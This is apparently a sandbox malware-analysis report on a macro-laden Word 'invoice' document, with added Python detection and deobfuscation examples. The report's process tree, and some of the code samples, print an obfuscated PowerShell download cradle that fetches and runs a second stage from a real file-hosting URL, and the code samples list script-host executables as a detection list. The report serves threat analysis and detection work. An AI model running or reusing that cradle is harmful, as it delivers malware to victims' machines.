Analysis
-
max time kernel
46s
-
max time network
19s
-
platform
windows7_x64
-
resource
win7-20230712-en
-
resource tags
arch:x64, arch:x86, image:win7-20230712-en, locale:en-us, os:windows7-x64, system
-
submitted
12-08-2023 07:58
Behavioral task
behavioral1
Sample
INVOICE PACKAGE LINK TO DOWNLOAD.docm
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
INVOICE PACKAGE LINK TO DOWNLOAD.docm
Resource
win10v2004-20230703-en
General
-
Target
INVOICE PACKAGE LINK TO DOWNLOAD.docm
-
Size
16KB
-
MD5
f2d0c66b801244c059f636d08a474079
-
SHA1
c62129fff128817b5af62aa0051c082f9992112e
-
SHA256
08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873
-
SHA512
5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d
-
SSDEEP
384:/iMIoinwt9VRFPZ1AZy8WNxt/ZtNN6wyMDv6js2ZzoP6Yv:/7u651AQrxllN6wyMOAOUPPv
Malware Config
Extracted
https://filetransfer.io/data-package/UR2whuBv/download
Signatures
-
Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro; for a macro-enabled .docm opened in Word, the VBA macro is the usual cause.
Processes:
description                                                                                                pid   pid_target  process         target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process  2220  2656        powershell.exe  WINWORD.EXE
-
Blocklisted process makes network request (3 IoCs)
Processes:
flow  pid   process
5     2220  powershell.exe
7     2220  powershell.exe
9     2220  powershell.exe
-
Drops file in Windows directory (1 IoC)
Processes:
description                   ioc                                process
File opened for modification  C:\Windows\Debug\WIA\wiatrace.log  WINWORD.EXE
-
Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
pid   process
2656  WINWORD.EXE
-
Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
pid   process
2220  powershell.exe
-
Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
description              pid   process
Token: SeDebugPrivilege  2220  powershell.exe
-
Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
pid   process
2656  WINWORD.EXE
2656  WINWORD.EXE
-
Suspicious use of WriteProcessMemory (8 IoCs)
Processes:
description                       pid   process      target process
PID 2656 wrote to memory of 2220  2656  WINWORD.EXE  powershell.exe
PID 2656 wrote to memory of 2220  2656  WINWORD.EXE  powershell.exe
PID 2656 wrote to memory of 2220  2656  WINWORD.EXE  powershell.exe
PID 2656 wrote to memory of 2220  2656  WINWORD.EXE  powershell.exe
PID 2656 wrote to memory of 2916  2656  WINWORD.EXE  splwow64.exe
PID 2656 wrote to memory of 2916  2656  WINWORD.EXE  splwow64.exe
PID 2656 wrote to memory of 2916  2656  WINWORD.EXE  splwow64.exe
PID 2656 wrote to memory of 2916  2656  WINWORD.EXE  splwow64.exe
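As an added example that is not part of the sandbox report, the following Python reproduces the parent/child check behind the first signature over constructed process-creation events that mirror the report's process tree (PIDs 2656, 2220 and 2916). The explorer.exe parent of WINWORD.EXE and its PID 1420 are assumptions; the PowerShell command line is the report's with the long run of empty-string fragments shortened. The allow-list entry for splwow64.exe is deliberate: it is the print-driver host that 32-bit Office starts on 64-bit Windows, so its presence under WINWORD.EXE is not itself an indicator.

```python
# Added example (not from the report): Office parent -> unexpected child check
# over constructed process-creation events. The explorer.exe parent and PID 1420
# are assumptions; the other PIDs and paths mirror the report's process tree.
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Script and LOLBin hosts an Office application has no business starting.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "bitsadmin.exe",
}

# Children that 32-bit Office legitimately spawns on 64-bit Windows:
# splwow64.exe is the print-driver host, which is why it appears under WINWORD.EXE.
EXPECTED_CHILDREN = {"splwow64.exe"}


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    parent_pid: int
    parent_image: str
    cmdline: str


# Constructed events modelled on the report's tree (explorer.exe/1420 assumed).
EVENTS = [
    ProcEvent(2656, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              1420, r"C:\Windows\explorer.exe",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm"'),
    ProcEvent(2220, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              2656, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              "powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient')))"
              ".(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tring'))"
              ".InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))"),
    ProcEvent(2916, r"C:\Windows\splwow64.exe",
              2656, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r"C:\Windows\splwow64.exe 12288"),
]


def image_name(path: str) -> str:
    """Case-folded file name of an image path (either Windows separator)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def obfuscation_score(cmdline: str) -> int:
    """Crude count of the two tricks this sample uses: backtick-split
    barewords and '+'-concatenated single-quoted fragments."""
    return cmdline.count("`") + cmdline.count("'+'")


def find_unexpected_children(events):
    """One alert per process whose parent is an Office application and
    which is not on the short allow-list of expected Office children."""
    alerts = []
    for ev in events:
        parent, child = image_name(ev.parent_image), image_name(ev.image)
        if parent not in OFFICE_PARENTS or child in EXPECTED_CHILDREN:
            continue
        alerts.append({
            "pid": ev.pid,
            "parent_pid": ev.parent_pid,
            "child": child,
            "parent": parent,
            "severity": "high" if child in SCRIPT_HOSTS else "medium",
            "obfuscation_score": obfuscation_score(ev.cmdline),
        })
    return alerts


if __name__ == "__main__":
    for alert in find_unexpected_children(EVENTS):
        print(alert)
```

Run against the constructed events it raises exactly one alert, for powershell.exe (PID 2220) under WINWORD.EXE (PID 2656); splwow64.exe is skipped by the allow-list. In a real pipeline the events would come from Sysmon event ID 1 or Windows 4688 with command-line auditing enabled.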
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (PID 2656, depth 1)
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm"
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2220, depth 2, child of WINWORD.EXE)
  Command line: powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
-
  C:\Windows\splwow64.exe (PID 2916, depth 2, child of WINWORD.EXE)
  Command line: C:\Windows\splwow64.exe 12288
-
The PowerShell command line is the key indicator. The backticks split barewords (I`EX is IEX, n`e`W`-Obj`E`c`T is New-Object) and the '+' chains and empty '' fragments rebuild 'Net.Webclient' and 'Downloadstring', so the line is the classic cradle IEX ((New-Object Net.WebClient).DownloadString('https://filetransfer.io/data-package/UR2whuBv/download')): fetch the second stage from the extracted URL and run it in memory without touching disk. The SysWOW64 path shows this is 32-bit PowerShell, as expected from the 32-bit Office14 install under Program Files (x86). The splwow64.exe child is the print-driver host that 32-bit Office starts on 64-bit Windows and is not itself suspicious.
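As an added example, not code from the report or its author, the following Python deobfuscates the cradle statically: it drops backticks outside single-quoted literals, folds '+'-concatenated fragments, unwraps the redundant parentheses around lone literals, and then extracts the URL and the WebClient member being called. The sample command line is the report's with the long run of ''+'' fragments shortened. Double-quoted strings, where a backtick is a real escape, are out of scope and would need separate handling.

```python
# Added example (not from the report): static deobfuscation of the backtick /
# string-concatenation PowerShell cradle. SAMPLE_CMDLINE is the report's command
# line with the run of ''+'' empty fragments shortened.
import re

SAMPLE_CMDLINE = (
    "powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient')))"
    ".(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+'n'+'g'))"
    ".InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))"
)

_LIT = r"'((?:[^']|'')*)'"                       # single-quoted literal; '' escapes a quote
_CONCAT = re.compile(_LIT + r"\s*\+\s*" + _LIT)  # 'a' + 'b'
# ( 'lit' ) not preceded by an identifier char, '.' or ')' so that call and
# member-access parentheses such as .('x') and InVokE('x') are left alone.
_PAREN_LIT = re.compile(r"(?<![\w.)])\(\s*(" + _LIT + r")\s*\)")
_URL = re.compile("https?://[^\\s'\"()]+", re.I)
_CRADLE_MEMBERS = ("DownloadString", "DownloadFile", "DownloadData", "OpenRead")


def strip_backticks(cmd: str) -> str:
    """Remove backticks outside single-quoted strings. In a bareword a backtick
    only escapes the next character, so I`EX is IEX; inside '...' it is literal."""
    out, in_str = [], False
    for ch in cmd:
        if ch == "'":
            in_str = not in_str
        elif ch == "`" and not in_str:
            continue
        out.append(ch)
    return "".join(out)


def merge_concats(cmd: str) -> str:
    """Fold 'a'+'b'+'' chains into one literal, repeating until stable."""
    prev = None
    while prev != cmd:
        prev, cmd = cmd, _CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", cmd)
    return cmd


def unwrap_literal_parens(cmd: str) -> str:
    """Strip grouping parentheses that wrap nothing but a single literal."""
    prev = None
    while prev != cmd:
        prev, cmd = cmd, _PAREN_LIT.sub(r"\1", cmd)
    return cmd


def analyse(cmdline: str) -> dict:
    """Deobfuscate and pull out the cradle's URL and WebClient member."""
    clean = unwrap_literal_parens(merge_concats(strip_backticks(cmdline)))
    low = clean.lower()
    return {
        "deobfuscated": clean,
        "urls": _URL.findall(clean),
        "invoke_expression": re.search(r"\b(iex|invoke-expression)\b", low) is not None,
        "webclient": "net.webclient" in low,
        "download_members": [m for m in _CRADLE_MEMBERS if m.lower() in low],
    }


if __name__ == "__main__":
    for key, value in analyse(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```

The result is a readable IEX ((neW-ObjEcT 'Net.Webclient').('Downloadstring').InVokE('https://filetransfer.io/data-package/UR2whuBv/download')) plus the extracted URL, which is what you would feed into blocklists or pivot on. The folding is purely lexical, so it is safe to run on untrusted command lines; nothing is executed.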
Network
MITRE ATT&CK Matrix
Downloads
-
Note: the three files below are written by CryptoAPI during the TLS connection (the CryptnetUrlCache entry and the Cab/Tar temp files from the root-certificate update), not by the download cradle itself; no payload written by powershell.exe appears in this list.
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize: 344B
MD5: 2773119d5fff52b5a4e90f173b89e4e5
SHA1: 8769c04067f360ae3fff05ad696473b9f8bb34e7
SHA256: df29bbff3025843c60b681bc16f12e553c3e1320e84322bee02e6f1dbfd484d6
SHA512: 036a344b3a419814e41f836094d341d0040b437cfc476a506171894b2c468d6e2dd0377bea00f72fe2e7b30cb476006e9d95768941f89f0af093b16561992176
-
C:\Users\Admin\AppData\Local\Temp\CabAAB3.tmp
Filesize: 62KB
MD5: 3ac860860707baaf32469fa7cc7c0192
SHA1: c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256: d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512: d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c
-
C:\Users\Admin\AppData\Local\Temp\TarAB52.tmp
Filesize: 164KB
MD5: 4ff65ad929cd9a367680e0e5b1c08166
SHA1: c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256: c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512: f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27
-
memory/2220-66-0x000000006B210000-0x000000006B7BB000-memory.dmp
Filesize: 5.7MB
-
memory/2220-68-0x00000000027A0000-0x00000000027E0000-memory.dmp
Filesize: 256KB
-
memory/2220-67-0x000000006B210000-0x000000006B7BB000-memory.dmp
Filesize: 5.7MB
-
memory/2220-69-0x00000000027A0000-0x00000000027E0000-memory.dmp
Filesize: 256KB
-
memory/2220-70-0x00000000027A0000-0x00000000027E0000-memory.dmp
Filesize: 256KB
-
memory/2220-138-0x000000006B210000-0x000000006B7BB000-memory.dmp
Filesize: 5.7MB
-
memory/2656-54-0x000000002F1D0000-0x000000002F32D000-memory.dmp
Filesize: 1.4MB
-
memory/2656-75-0x000000002F1D0000-0x000000002F32D000-memory.dmp
Filesize: 1.4MB
-
memory/2656-61-0x0000000006090000-0x0000000006190000-memory.dmp
Filesize: 1024KB
-
memory/2656-56-0x00000000719FD000-0x0000000071A08000-memory.dmp
Filesize: 44KB
-
memory/2656-55-0x000000005FFF0000-0x0000000060000000-memory.dmp
Filesize: 64KB
-
memory/2656-137-0x00000000719FD000-0x0000000071A08000-memory.dmp
Filesize: 44KB
-
memory/2656-139-0x0000000006090000-0x0000000006190000-memory.dmp
Filesize: 1024KB